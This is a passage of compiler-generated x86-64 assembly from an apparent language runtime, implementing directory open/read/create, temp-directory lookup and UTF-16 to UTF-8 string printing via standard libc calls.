.-shar__file__rename .globl shar__open__directory .type shar__open__directory, @function shar__open__directory: .LFB30: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 160 mov QWORD PTR -136[rbp], rdi mov QWORD PTR -144[rbp], rsi mov QWORD PTR -152[rbp], rdx mov rax, QWORD PTR -136[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -144[rbp] mov QWORD PTR -88[rbp], rax mov QWORD PTR -80[rbp], 0 mov QWORD PTR -72[rbp], 0 mov QWORD PTR -64[rbp], 0 mov QWORD PTR -56[rbp], 0 jmp .L309 .L321: mov rax, QWORD PTR -56[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -114[rbp], ax mov BYTE PTR -115[rbp], 0 cmp WORD PTR -114[rbp], 0 je .L326 cmp WORD PTR -114[rbp], 127 ja .L312 mov BYTE PTR -115[rbp], 1 jmp .L313 .L312: cmp WORD PTR -114[rbp], 2047 ja .L314 mov BYTE PTR -115[rbp], 2 jmp .L313 .L314: mov BYTE PTR -115[rbp], 3 .L313: movzx eax, BYTE PTR -115[rbp] add QWORD PTR -64[rbp], rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -64[rbp] mov QWORD PTR -40[rbp], rax mov rdx, QWORD PTR -40[rbp] mov rax, QWORD PTR -48[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -32[rbp], rax cmp QWORD PTR -32[rbp], 0 sete al movzx eax, al test rax, rax je .L315 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L315: mov rax, QWORD PTR -32[rbp] mov QWORD PTR -80[rbp], rax movzx eax, BYTE PTR -115[rbp] cmp eax, 3 je .L317 cmp eax, 3 jg .L318 cmp eax, 1 je .L319 cmp eax, 2 je .L320 jmp .L318 .L319: mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx movzx edx, WORD PTR -114[rbp] mov BYTE PTR [rax], dl jmp .L318 .L320: movzx eax, WORD PTR -114[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L318 .L317: movzx eax, WORD PTR -114[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L318: movzx eax, BYTE PTR -115[rbp] add QWORD PTR -72[rbp], rax jmp .L311 .L326: nop .L311: add QWORD PTR -56[rbp], 1 .L309: mov rax, QWORD PTR -96[rbp] cmp rax, QWORD PTR -56[rbp] ja .L321 mov rax, QWORD PTR -64[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -80[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L322 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L322: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -80[rbp], rax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -80[rbp] mov QWORD PTR -112[rbp], rax mov rax, QWORD PTR -112[rbp] mov rdi, rax call opendir@PLT mov QWORD PTR -104[rbp], rax mov rdx, QWORD PTR -104[rbp] mov rax, QWORD PTR -152[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -112[rbp] mov rdi, rax call free@PLT cmp QWORD PTR -104[rbp], 0 setne al leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE30: .size shar__open__directory, .-shar__open__directory .globl shar__read__directory .type shar__read__directory, @function shar__read__directory: .LFB31: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 176 mov QWORD PTR -136[rbp], rdi mov QWORD PTR -144[rbp], rsi mov QWORD PTR -152[rbp], rdx mov QWORD PTR -160[rbp], rcx mov QWORD PTR -168[rbp], r8 .L332: mov rax, QWORD PTR -136[rbp] mov rdi, rax call readdir@PLT mov QWORD PTR -120[rbp], rax cmp QWORD PTR -120[rbp], 0 setne al mov BYTE PTR -126[rbp], al movzx eax, BYTE PTR -126[rbp] xor eax, 1 test al, al jne .L363 mov rax, QWORD PTR -120[rbp] add rax, 19 mov QWORD PTR -112[rbp], rax mov rax, QWORD PTR -112[rbp] mov rdi, rax call strlen@PLT mov QWORD PTR -104[rbp], rax mov rax, QWORD PTR -112[rbp] movzx eax, BYTE PTR [rax] cmp al, 46 jne .L330 cmp QWORD PTR -104[rbp], 1 je .L332 cmp QWORD PTR -104[rbp], 2 jne .L330 mov rax, QWORD PTR -112[rbp] add rax, 1 movzx eax, BYTE PTR [rax] cmp al, 46 jne .L330 jmp .L332 .L330: mov rax, QWORD PTR -144[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -112[rbp] mov QWORD PTR -88[rbp], rax mov rax, QWORD PTR -152[rbp] mov QWORD PTR -80[rbp], rax mov rax, QWORD PTR -160[rbp] mov QWORD PTR -72[rbp], rax mov QWORD PTR -64[rbp], 0 cmp QWORD PTR -96[rbp], 0 sete al movzx eax, al test rax, rax je .L333 mov QWORD PTR -56[rbp], 0 jmp .L334 .L333: mov rax, QWORD PTR -96[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -40[rbp], rax cmp QWORD PTR -40[rbp], 0 sete al movzx eax, al test rax, rax je .L335 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L335: mov rax, QWORD PTR -40[rbp] mov QWORD PTR -56[rbp], rax .L334: mov QWORD PTR -32[rbp], 0 mov BYTE PTR -125[rbp], 1 .L348: mov rdx, QWORD PTR -88[rbp] mov rax, QWORD PTR -32[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -124[rbp], al cmp BYTE PTR -124[rbp], 0 je .L364 mov BYTE PTR -123[rbp], 0 movzx eax, BYTE PTR -124[rbp] mov WORD PTR -122[rbp], ax movzx eax, BYTE PTR -124[rbp] test al, al js .L339 mov BYTE PTR -123[rbp], 1 jmp .L340 .L339: movzx eax, BYTE PTR -124[rbp] and eax, 224 cmp eax, 192 jne .L341 mov BYTE PTR -123[rbp], 2 mov rax, QWORD PTR -32[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -124[rbp], al movzx eax, BYTE PTR -124[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L342 mov BYTE PTR -125[rbp], 0 jmp .L338 .L342: xor WORD PTR -122[rbp], 192 sal WORD PTR -122[rbp], 6 movzx eax, BYTE PTR -124[rbp] xor eax, -128 movzx eax, al or WORD PTR -122[rbp], ax jmp .L340 .L341: movzx eax, BYTE PTR -124[rbp] and eax, 240 cmp eax, 224 jne .L343 mov BYTE PTR -123[rbp], 3 mov rax, QWORD PTR -32[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -124[rbp], al movzx eax, BYTE PTR -124[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L344 mov BYTE PTR -125[rbp], 0 jmp .L338 .L344: xor WORD PTR -122[rbp], 224 sal WORD PTR -122[rbp], 6 movzx eax, BYTE PTR -124[rbp] xor eax, -128 movzx eax, al or WORD PTR -122[rbp], ax mov rax, QWORD PTR -32[rbp] lea rdx, 2[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -124[rbp], al movzx eax, BYTE PTR -124[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L345 mov BYTE PTR -125[rbp], 0 jmp .L338 .L345: sal WORD PTR -122[rbp], 6 movzx eax, BYTE PTR -124[rbp] xor eax, -128 movzx eax, al or WORD PTR -122[rbp], ax jmp .L340 .L343: mov BYTE PTR -125[rbp], 0 jmp .L338 .L340: add QWORD PTR -64[rbp], 1 mov rax, QWORD PTR -64[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -96[rbp] add rdx, rax mov rax, QWORD PTR -56[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L346 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L346: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -56[rbp], rax mov rax, QWORD PTR -64[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -96[rbp] add rax, rdx lea rdx, -2[rax] mov rax, QWORD PTR -56[rbp] add rdx, rax movzx eax, WORD PTR -122[rbp] mov WORD PTR [rdx], ax movzx eax, BYTE PTR -123[rbp] add QWORD PTR -32[rbp], rax jmp .L348 .L364: nop .L338: movzx eax, BYTE PTR -125[rbp] xor eax, 1 movzx eax, al test rax, rax je .L349 cmp QWORD PTR -56[rbp], 0 je .L350 mov rax, QWORD PTR -56[rbp] mov rdi, rax call free@PLT .L350: mov QWORD PTR -56[rbp], 0 mov QWORD PTR -64[rbp], 0 .L349: mov rax, QWORD PTR -72[rbp] mov rdx, QWORD PTR -56[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -80[rbp] mov rdx, QWORD PTR -64[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -120[rbp] movzx eax, BYTE PTR 18[rax] movzx eax, al cmp eax, 12 ja .L352 mov eax, eax lea rdx, 0[0+rax*4] lea rax, .L354[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L354[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L354: .long .L352-.L354 .long .L360-.L354 .long .L359-.L354 .long .L352-.L354 .long .L358-.L354 .long .L352-.L354 .long .L357-.L354 .long .L352-.L354 .long .L356-.L354 .long .L352-.L354 .long .L355-.L354 .long .L352-.L354 .long .L353-.L354 .text .L357: mov rax, QWORD PTR -168[rbp] mov BYTE PTR [rax], 0 jmp .L361 .L359: mov rax, QWORD PTR -168[rbp] mov BYTE PTR [rax], 1 jmp .L361 .L358: mov rax, QWORD PTR -168[rbp] mov BYTE PTR [rax], 2 jmp .L361 .L360: mov rax, QWORD PTR -168[rbp] mov BYTE PTR [rax], 3 jmp .L361 .L355: mov rax, QWORD PTR -168[rbp] mov BYTE PTR [rax], 4 jmp .L361 .L356: mov rax, QWORD PTR -168[rbp] mov BYTE PTR [rax], 5 jmp .L361 .L353: mov rax, QWORD PTR -168[rbp] mov BYTE PTR [rax], 6 jmp .L361 .L352: mov rax, QWORD PTR -168[rbp] mov BYTE PTR [rax], -1 nop .L361: jmp .L329 .L363: nop .L329: movzx eax, BYTE PTR -126[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE31: .size shar__read__directory, .-shar__read__directory .globl shar__close__directory .type shar__close__directory, @function shar__close__directory: .LFB32: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rdi, rax call closedir@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE32: .size shar__close__directory, .-shar__close__directory .globl shar__make__directory .type shar__make__directory, @function shar__make__directory: .LFB33: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 144 mov QWORD PTR -120[rbp], rdi mov QWORD PTR -128[rbp], rsi mov eax, edx mov BYTE PTR -132[rbp], al mov rax, QWORD PTR -120[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -128[rbp] mov QWORD PTR -88[rbp], rax mov QWORD PTR -80[rbp], 0 mov QWORD PTR -72[rbp], 0 mov QWORD PTR -64[rbp], 0 mov QWORD PTR -56[rbp], 0 jmp .L367 .L379: mov rax, QWORD PTR -56[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -106[rbp], ax mov BYTE PTR -107[rbp], 0 cmp WORD PTR -106[rbp], 0 je .L385 cmp WORD PTR -106[rbp], 127 ja .L370 mov BYTE PTR -107[rbp], 1 jmp .L371 .L370: cmp WORD PTR -106[rbp], 2047 ja .L372 mov BYTE PTR -107[rbp], 2 jmp .L371 .L372: mov BYTE PTR -107[rbp], 3 .L371: movzx eax, BYTE PTR -107[rbp] add QWORD PTR -64[rbp], rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -64[rbp] mov QWORD PTR -40[rbp], rax mov rdx, QWORD PTR -40[rbp] mov rax, QWORD PTR -48[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -32[rbp], rax cmp QWORD PTR -32[rbp], 0 sete al movzx eax, al test rax, rax je .L373 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L373: mov rax, QWORD PTR -32[rbp] mov QWORD PTR -80[rbp], rax movzx eax, BYTE PTR -107[rbp] cmp eax, 3 je .L375 cmp eax, 3 jg .L376 cmp eax, 1 je .L377 cmp eax, 2 je .L378 jmp .L376 .L377: mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx movzx edx, WORD PTR -106[rbp] mov BYTE PTR [rax], dl jmp .L376 .L378: movzx eax, WORD PTR -106[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -106[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L376 .L375: movzx eax, WORD PTR -106[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -106[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -106[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L376: movzx eax, BYTE PTR -107[rbp] add QWORD PTR -72[rbp], rax jmp .L369 .L385: nop .L369: add QWORD PTR -56[rbp], 1 .L367: mov rax, QWORD PTR -96[rbp] cmp rax, QWORD PTR -56[rbp] ja .L379 mov rax, QWORD PTR -64[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -80[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L380 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L380: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -80[rbp], rax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -80[rbp] mov QWORD PTR -104[rbp], rax mov rax, QWORD PTR -104[rbp] mov esi, 16895 mov rdi, rax call mkdir@PLT test eax, eax sete al mov BYTE PTR -108[rbp], al movzx eax, BYTE PTR -108[rbp] xor eax, 1 test al, al je .L383 cmp BYTE PTR -132[rbp], 0 je .L383 call __errno_location@PLT mov eax, DWORD PTR [rax] cmp eax, 17 sete al mov BYTE PTR -108[rbp], al .L383: mov rax, QWORD PTR -104[rbp] mov rdi, rax call free@PLT movzx eax, BYTE PTR -108[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE33: .size shar__make__directory, .-shar__make__directory .section .rodata .LC1: .string "/tmp" .text .globl shar__get__tmp__dir__name .type shar__get__tmp__dir__name, @function shar__get__tmp__dir__name: .LFB34: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 144 mov QWORD PTR -120[rbp], rdi mov QWORD PTR -128[rbp], rsi mov QWORD PTR -136[rbp], rdx mov rax, QWORD PTR -120[rbp] mov QWORD PTR -96[rbp], rax lea rax, .LC1[rip] mov QWORD PTR -88[rbp], rax mov rax, QWORD PTR -128[rbp] mov QWORD PTR -80[rbp], rax mov rax, QWORD PTR -136[rbp] mov QWORD PTR -72[rbp], rax mov QWORD PTR -64[rbp], 0 cmp QWORD PTR -96[rbp], 0 sete al movzx eax, al test rax, rax je .L387 mov QWORD PTR -56[rbp], 0 jmp .L388 .L387: mov rax, QWORD PTR -96[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -40[rbp], rax cmp QWORD PTR -40[rbp], 0 sete al movzx eax, al test rax, rax je .L389 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L389: mov rax, QWORD PTR -40[rbp] mov QWORD PTR -56[rbp], rax .L388: mov QWORD PTR -32[rbp], 0 mov BYTE PTR -101[rbp], 1 .L402: mov rdx, QWORD PTR -88[rbp] mov rax, QWORD PTR -32[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -100[rbp], al cmp BYTE PTR -100[rbp], 0 je .L406 mov BYTE PTR -99[rbp], 0 movzx eax, BYTE PTR -100[rbp] mov WORD PTR -98[rbp], ax movzx eax, BYTE PTR -100[rbp] test al, al js .L393 mov BYTE PTR -99[rbp], 1 jmp .L394 .L393: movzx eax, BYTE PTR -100[rbp] and eax, 224 cmp eax, 192 jne .L395 mov BYTE PTR -99[rbp], 2 mov rax, QWORD PTR -32[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -100[rbp], al movzx eax, BYTE PTR -100[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L396 mov BYTE PTR -101[rbp], 0 jmp .L392 .L396: xor WORD PTR -98[rbp], 192 sal WORD PTR -98[rbp], 6 movzx eax, BYTE PTR -100[rbp] xor eax, -128 movzx eax, al or WORD PTR -98[rbp], ax jmp .L394 .L395: movzx eax, BYTE PTR -100[rbp] and eax, 240 cmp eax, 224 jne .L397 mov BYTE PTR -99[rbp], 3 mov rax, QWORD PTR -32[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -100[rbp], al movzx eax, BYTE PTR -100[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L398 mov BYTE PTR -101[rbp], 0 jmp .L392 .L398: xor WORD PTR -98[rbp], 224 sal WORD PTR -98[rbp], 6 movzx eax, BYTE PTR -100[rbp] xor eax, -128 movzx eax, al or WORD PTR -98[rbp], ax mov rax, QWORD PTR -32[rbp] lea rdx, 2[rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -100[rbp], al movzx eax, BYTE PTR -100[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L399 mov BYTE PTR -101[rbp], 0 jmp .L392 .L399: sal WORD PTR -98[rbp], 6 movzx eax, BYTE PTR -100[rbp] xor eax, -128 movzx eax, al or WORD PTR -98[rbp], ax jmp .L394 .L397: mov BYTE PTR -101[rbp], 0 jmp .L392 .L394: add QWORD PTR -64[rbp], 1 mov rax, QWORD PTR -64[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -96[rbp] add rdx, rax mov rax, QWORD PTR -56[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L400 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L400: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -56[rbp], rax mov rax, QWORD PTR -64[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -96[rbp] add rax, rdx lea rdx, -2[rax] mov rax, QWORD PTR -56[rbp] add rdx, rax movzx eax, WORD PTR -98[rbp] mov WORD PTR [rdx], ax movzx eax, BYTE PTR -99[rbp] add QWORD PTR -32[rbp], rax jmp .L402 .L406: nop .L392: movzx eax, BYTE PTR -101[rbp] xor eax, 1 movzx eax, al test rax, rax je .L403 cmp QWORD PTR -56[rbp], 0 je .L404 mov rax, QWORD PTR -56[rbp] mov rdi, rax call free@PLT .L404: mov QWORD PTR -56[rbp], 0 mov QWORD PTR -64[rbp], 0 .L403: mov rax, QWORD PTR -72[rbp] mov rdx, QWORD PTR -56[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -80[rbp] mov rdx, QWORD PTR -64[rbp] mov QWORD PTR [rax], rdx nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE34: .size shar__get__tmp__dir__name, .-shar__get__tmp__dir__name .globl shar__print__string .type shar__print__string, @function shar__print__string: .LFB36: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 336 mov QWORD PTR -328[rbp], rdi mov QWORD PTR -336[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR stdout[rip] mov rdx, QWORD PTR -328[rbp] mov QWORD PTR -312[rbp], rdx mov rdx, QWORD PTR -336[rbp] mov QWORD PTR -304[rbp], rdx mov QWORD PTR -296[rbp], rax mov BYTE PTR -315[rbp], 0 cmp QWORD PTR -312[rbp], 0 jne .L408 cmp BYTE PTR -315[rbp], 0 je .L421 .L408: mov QWORD PTR -288[rbp], 0 mov QWORD PTR -280[rbp], 0 jmp .L410 .L416: mov rax, QWORD PTR -280[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -304[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -314[rbp], ax cmp WORD PTR -314[rbp], 0 je .L422 cmp WORD PTR -314[rbp], 127 ja .L413 movzx eax, WORD PTR -314[rbp] mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L414 .L413: cmp WORD PTR -314[rbp], 2047 ja .L415 movzx eax, WORD PTR -314[rbp] shr ax, 6 or eax, -64 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L414 .L415: movzx eax, WORD PTR -314[rbp] shr ax, 12 or eax, -32 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 .L414: cmp QWORD PTR -288[rbp], 253 jbe .L412 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT mov QWORD PTR -288[rbp], 0 jmp .L412 .L422: nop .L412: add QWORD PTR -280[rbp], 1 .L410: mov rax, QWORD PTR -312[rbp] cmp rax, QWORD PTR -280[rbp] ja .L416 cmp BYTE PTR -315[rbp], 0 je .L417 lea rdx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rdx mov BYTE PTR [rax], 10 add QWORD PTR -288[rbp], 1 .L417: cmp QWORD PTR -288[rbp], 0 je .L418 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT .L418: mov rax, QWORD PTR -296[rbp] mov rdi, rax call fflush@PLT .L421: nop nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L419 call __stack_chk_fail@PLT .L419: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE36: .size shar__print__string, .-shar__print__string .globl shar__println__string .type shar__println__string, @function shar__println__string: .LFB37: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 336 mov QWORD PTR -328[rbp], rdi mov QWORD PTR -336[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR stdout[rip] mov rdx, QWORD PTR -328[rbp] mov QWORD PTR -312[rbp], rdx mov rdx, QWORD PTR -336[rbp] mov QWORD PTR -304[rbp], rdx mov QWORD PTR -296[rbp], rax mov BYTE PTR -315[rbp], 1 cmp QWORD PTR -312[rbp], 0 jne .L424 cmp BYTE PTR -315[rbp], 0 je .L437 .L424: mov QWORD PTR -288[rbp], 0 mov QWORD PTR -280[rbp], 0 jmp .L426 .L432: mov rax, QWORD PTR -280[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -304[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -314[rbp], ax cmp WORD PTR -314[rbp], 0 je .L438 cmp WORD PTR -314[rbp], 127 ja .L429 movzx eax, WORD PTR -314[rbp] mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L430 .L429: cmp WORD PTR -314[rbp], 2047 ja .L431 movzx eax, WORD PTR -314[rbp] shr ax, 6 or eax, -64 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L430 .L431: movzx eax, WORD PTR -314[rbp] shr ax, 12 or eax, -32 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov 